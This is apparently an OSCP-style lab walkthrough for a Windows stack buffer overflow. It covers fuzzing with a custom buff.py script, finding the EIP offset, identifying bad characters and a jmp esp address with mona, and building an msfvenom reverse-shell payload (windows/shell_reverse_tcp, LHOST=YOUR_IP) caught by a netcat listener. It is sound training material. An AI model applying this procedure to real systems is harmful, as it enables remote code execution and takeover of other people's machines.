Step 0 - Download Script
I made a simple python script to make exploiting buffer overflows simpler. Download the script here.
Step 1 - Fuzzing
This command will give us a general idea of where the program crashes at.
python buff.py --fuzz -d 10.10.253.128 -p 1337
Step 2 - Finding the Offset by Creating Pattern
After running the python script in step 1, you should have an idea of where the program crashes at. Use the command below and append an additional 400 characters to it.
python buff.py --offset -d 10.10.253.128 -p 1337 -l 1100
Step 3 - Finding the Offset by Querying Pattern
Get the EIP from where the program crashed. The command below will tell you exactly where the EIP was overwritten.
python buff.py --query -q 76413176
Step 4 - Finding Bad Characters by Sending Bytearray
The command below will send a bytearray to the program, we can then use mona.py to determine which characters are bad characters.
python buff.py --chars -d 10.10.253.128 -p 1337 -o 634
After sending the payload, check that the EIP register is equal to 42424242 (all B's). Otherwise your offset value is incorrect.
Step 5 - Finding Bad Characters by Querying Bytearray
Within Immunity Debugger, set the working directory of mona:
!mona config -set workingfolder c:\mona\%p
Generate a bytearray:
!mona bytearray -b "\x00"
Check for bad characters:
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>
Step 6 - Finding Jump Point
With the list of bad characters identified, use mona command below by adding the bad characters to the command.
!mona jmp -r esp -cpb "\x00........."
Example
!mona jmp -r esp -cpb "\x00\x07\x08\x2e\x2f\xa0\xa1"
Note: Sometimes badchars cause the next byte to get corrupted as well, or even the rest of the string. If the command above returns zero results, try removing the additional bytes that could have been corrupted.
Original:
\x00\x07\x08\x2e\x2f\xa0\xa1
Modified:
\x00\x07\x2e\xa0
The result displays all the `jmp esp` instructions with addresses that don't contain any of the bad characters.
Choose one of the addresses from the result of jmp esp. Note: You will need to write the address backwards since the system is little endian.
Address:
0x625011af
-->625011af
retn:
af115062
Step 7 - Exploiting
Run the following msfvenom command and update the `-b` option with all the bad characters identified eariler.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c
Change the payload variable in the payload function of buff.py to the output of the command.
Lastly, start a netcat listener on the port specified in the msfvenom payload and run the command below to get a reverse shell.
python buff.py --exploit -d 10.10.253.128 -p 1337 -o 634 -r 'af115062'